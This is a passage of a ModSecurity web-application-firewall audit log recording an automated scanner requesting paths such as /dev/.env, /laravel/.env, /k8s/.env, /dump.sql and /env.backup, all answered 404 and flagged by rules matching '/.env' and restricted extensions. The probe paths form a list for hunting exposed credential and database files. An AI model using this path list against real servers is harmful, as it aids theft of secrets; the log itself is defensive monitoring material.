"210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/debug.log"] [unique_id "aFCsCwJ4p5Cdblnjra53-AAAAAI"] Stopwatch: 1750117387033717 3967 (- - -) Stopwatch2: 1750117387033717 3967; combined=2386, p1=421, p2=1823, p3=30, p4=37, p5=75, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --16d64d33-Z-- --68ce1f3e-A-- [17/Jun/2025:05:13:07.478342 +0530] aFCsC1CTF37l_jAzt4oTCQAAAAU 185.177.72.204 36384 127.0.0.1 7080 --68ce1f3e-B-- GET /dev/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --68ce1f3e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --68ce1f3e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/dev/.env"] [unique_id "aFCsC1CTF37l_jAzt4oTCQAAAAU"] Stopwatch: 1750117387475361 3025 (- - -) Stopwatch2: 1750117387475361 3025; combined=1752, p1=392, p2=1262, p3=21, p4=25, p5=52, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --68ce1f3e-Z-- --d349f00c-A-- [17/Jun/2025:05:13:07.699270 +0530] aFCsC-TJOk1gXj_qIh4X-wAAAAQ 185.177.72.204 36402 127.0.0.1 7080 --d349f00c-B-- GET /dev/db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d349f00c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --d349f00c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/dev/db.sql"] [unique_id "aFCsC-TJOk1gXj_qIh4X-wAAAAQ"] Stopwatch: 1750117387696058 3261 (- - -) Stopwatch2: 1750117387696058 3261; combined=2049, p1=371, p2=1578, p3=20, p4=25, p5=55, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d349f00c-Z-- --c7ba4042-A-- [17/Jun/2025:05:13:08.141374 +0530] aFCsDFJfblPUQiSn5r2RqwAAAAA 185.177.72.204 36436 127.0.0.1 7080 --c7ba4042-B-- GET /development/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c7ba4042-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7ba4042-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/development/.env"] [unique_id "aFCsDFJfblPUQiSn5r2RqwAAAAA"] Stopwatch: 1750117388138415 3010 (- - -) Stopwatch2: 1750117388138415 3010; combined=1743, p1=403, p2=1238, p3=20, p4=28, p5=53, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c7ba4042-Z-- --32397143-A-- [17/Jun/2025:05:13:08.472943 +0530] aFCsDOTJOk1gXj_qIh4X_QAAAAQ 185.177.72.204 36468 127.0.0.1 7080 --32397143-B-- GET /docker/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --32397143-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --32397143-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/docker/.env"] [unique_id "aFCsDOTJOk1gXj_qIh4X_QAAAAQ"] Stopwatch: 1750117388469604 3385 (- - -) Stopwatch2: 1750117388469604 3385; combined=2096, p1=393, p2=1597, p3=22, p4=29, p5=55, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --32397143-Z-- --084d097c-A-- [17/Jun/2025:05:13:08.583378 +0530] aFCsDFJfblPUQiSn5r2RrAAAAAA 185.177.72.204 36470 127.0.0.1 7080 --084d097c-B-- GET /docker/app/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --084d097c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --084d097c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/docker/app/.env"] [unique_id "aFCsDFJfblPUQiSn5r2RrAAAAAA"] Stopwatch: 1750117388580091 3332 (- - -) Stopwatch2: 1750117388580091 3332; combined=2004, p1=408, p2=1485, p3=24, p4=28, p5=59, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --084d097c-Z-- --b7672d1c-A-- [17/Jun/2025:05:13:08.694075 +0530] aFCsDAJ4p5Cdblnjra53_AAAAAI 185.177.72.204 36478 127.0.0.1 7080 --b7672d1c-B-- GET /dump.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b7672d1c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7672d1c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/dump.bak"] [unique_id "aFCsDAJ4p5Cdblnjra53_AAAAAI"] Stopwatch: 1750117388690607 3522 (- - -) Stopwatch2: 1750117388690607 3522; combined=2092, p1=489, p2=1504, p3=19, p4=25, p5=55, sr=229, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b7672d1c-Z-- --6f2bb053-A-- [17/Jun/2025:05:13:08.804507 +0530] aFCsDNyZ4SMykfn97vy3iwAAAAs 185.177.72.204 36494 127.0.0.1 7080 --6f2bb053-B-- GET /dump.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6f2bb053-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f2bb053-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/dump.sql"] [unique_id "aFCsDNyZ4SMykfn97vy3iwAAAAs"] Stopwatch: 1750117388801421 3130 (- - -) Stopwatch2: 1750117388801421 3130; combined=1908, p1=324, p2=1468, p3=20, p4=25, p5=71, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6f2bb053-Z-- --ede5c769-A-- [17/Jun/2025:05:13:10.018850 +0530] aFCsDuTJOk1gXj_qIh4YAQAAAAQ 185.177.72.204 50356 127.0.0.1 7080 --ede5c769-B-- GET /env.backup HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ede5c769-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --ede5c769-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/env.backup"] [unique_id "aFCsDuTJOk1gXj_qIh4YAQAAAAQ"] Stopwatch: 1750117390014887 4017 (- - -) Stopwatch2: 1750117390014887 4017; combined=2499, p1=439, p2=1922, p3=29, p4=34, p5=75, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ede5c769-Z-- --e6cae858-A-- [17/Jun/2025:05:13:10.350109 +0530] aFCsDlCTF37l_jAzt4oTDAAAAAU 185.177.72.204 50382 127.0.0.1 7080 --e6cae858-B-- GET /env/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e6cae858-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6cae858-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/env/.env"] [unique_id "aFCsDlCTF37l_jAzt4oTDAAAAAU"] Stopwatch: 1750117390346892 3262 (- - -) Stopwatch2: 1750117390346892 3262; combined=1994, p1=389, p2=1504, p3=20, p4=27, p5=54, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e6cae858-Z-- --dd6bbd52-A-- [17/Jun/2025:05:13:10.460758 +0530] aFCsDooVQnPDyHnl9oPTywAAAAY 185.177.72.204 50398 127.0.0.1 7080 --dd6bbd52-B-- GET /error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --dd6bbd52-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd6bbd52-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/error.log"] [unique_id "aFCsDooVQnPDyHnl9oPTywAAAAY"] Stopwatch: 1750117390457471 3331 (- - -) Stopwatch2: 1750117390457471 3331; combined=2024, p1=338, p2=1582, p3=22, p4=26, p5=55, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dd6bbd52-Z-- --7d219b6f-A-- [17/Jun/2025:05:13:13.001840 +0530] aFCsEJVkCcfT-Z8NQYzFEAAAAAc 185.177.72.204 50594 127.0.0.1 7080 --7d219b6f-B-- GET /hidden/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7d219b6f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d219b6f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/hidden/.env"] [unique_id "aFCsEJVkCcfT-Z8NQYzFEAAAAAc"] Stopwatch: 1750117392998740 3151 (- - -) Stopwatch2: 1750117392998740 3151; combined=1922, p1=394, p2=1430, p3=19, p4=24, p5=55, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7d219b6f-Z-- --fafb6e2f-A-- [17/Jun/2025:05:13:15.432952 +0530] aFCsEwJ4p5Cdblnjra54DQAAAAI 185.177.72.204 50772 127.0.0.1 7080 --fafb6e2f-B-- GET /js/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fafb6e2f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --fafb6e2f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/js/.env"] [unique_id "aFCsEwJ4p5Cdblnjra54DQAAAAI"] Stopwatch: 1750117395429658 3339 (- - -) Stopwatch2: 1750117395429658 3339; combined=2040, p1=440, p2=1479, p3=21, p4=28, p5=72, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fafb6e2f-Z-- --cd978f12-A-- [17/Jun/2025:05:13:15.982909 +0530] aFCsE5VkCcfT-Z8NQYzFFQAAAAc 185.177.72.204 50818 127.0.0.1 7080 --cd978f12-B-- GET /k8s/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --cd978f12-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd978f12-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/k8s/.env"] [unique_id "aFCsE5VkCcfT-Z8NQYzFFQAAAAc"] Stopwatch: 1750117395979675 3277 (- - -) Stopwatch2: 1750117395979675 3277; combined=1959, p1=415, p2=1423, p3=30, p4=35, p5=55, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cd978f12-Z-- --7ddb2b57-A-- [17/Jun/2025:05:13:16.975068 +0530] aFCsFAJ4p5Cdblnjra54EQAAAAI 185.177.72.204 50892 127.0.0.1 7080 --7ddb2b57-B-- GET /kubernetes/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7ddb2b57-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ddb2b57-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/kubernetes/.env"] [unique_id "aFCsFAJ4p5Cdblnjra54EQAAAAI"] Stopwatch: 1750117396971930 3198 (- - -) Stopwatch2: 1750117396971930 3198; combined=1920, p1=428, p2=1399, p3=19, p4=23, p5=51, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7ddb2b57-Z-- --ed722f19-A-- [17/Jun/2025:05:13:17.306486 +0530] aFCsFYoVQnPDyHnl9oPT2gAAAAY 185.177.72.204 50926 127.0.0.1 7080 --ed722f19-B-- GET /kyc/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ed722f19-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed722f19-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/kyc/.env"] [unique_id "aFCsFYoVQnPDyHnl9oPT2gAAAAY"] Stopwatch: 1750117397302626 3918 (- - -) Stopwatch2: 1750117397302626 3918; combined=2413, p1=495, p2=1781, p3=29, p4=35, p5=73, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ed722f19-Z-- --9075ed3e-A-- [17/Jun/2025:05:13:17.636097 +0530] aFCsFVJfblPUQiSn5r2RwQAAAAA 185.177.72.204 50968 127.0.0.1 7080 --9075ed3e-B-- GET /laravel/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9075ed3e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --9075ed3e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/laravel/.env"] [unique_id "aFCsFVJfblPUQiSn5r2RwQAAAAA"] Stopwatch: 1750117397633375 2773 (- - -) Stopwatch2: 1750117397633375 2773; combined=1628, p1=362, p2=1173, p3=19, p4=23, p5=51, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9075ed3e-Z-- --bdfcd14d-A-- [17/Jun/2025:05:13:17.745658 +0530] aFCsFZWbMc1Q3J_M-mhIzwAAAAo 185.177.72.204 50976 127.0.0.1 7080 --bdfcd14d-B-- GET /laravel/core/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --bdfcd14d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --bdfcd14d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/laravel/core/.env"] [unique_id "aFCsFZWbMc1Q3J_M-mhIzwAAAAo"] Stopwatch: 1750117397743183 2545 (- - -) Stopwatch2: 1750117397743183 2545; combined=1561, p1=337, p2=1113, p3=11, p4=30, p5=70, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. 